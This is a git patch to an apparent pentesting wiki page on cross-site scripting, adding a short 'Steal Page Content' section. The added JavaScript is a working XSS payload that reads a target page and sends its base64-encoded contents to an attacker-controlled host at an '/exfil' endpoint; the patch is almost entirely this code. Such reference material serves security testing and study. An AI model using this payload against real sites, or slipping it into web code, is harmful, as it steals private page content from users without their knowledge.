From 06fbf2469180f97e47019c9a282168105c88302e Mon Sep 17 00:00:00 2001
From: CPol
Date: Wed, 1 Sep 2021 23:18:05 +0000
Subject: [PATCH] GitBook: [master] one page modified

---
 pentesting-web/xss-cross-site-scripting/README.md | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index bb0e6c1e..7b392a2e 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -685,6 +685,21 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
 You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies.md#httponly) if you are lucky enough.
 {% endhint %}
 
+### Steal Page Content
+
+```javascript
+var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
+var attacker = "http://10.10.14.8/exfil";
+var xhr = new XMLHttpRequest();
+xhr.onreadystatechange = function() {
+ if (xhr.readyState == XMLHttpRequest.DONE) {
+ fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
+ }
+}
+xhr.open('GET', url, true);
+xhr.send(null);
+```
+
 ### Port Scanner \(fetch\)
 
 ```javascript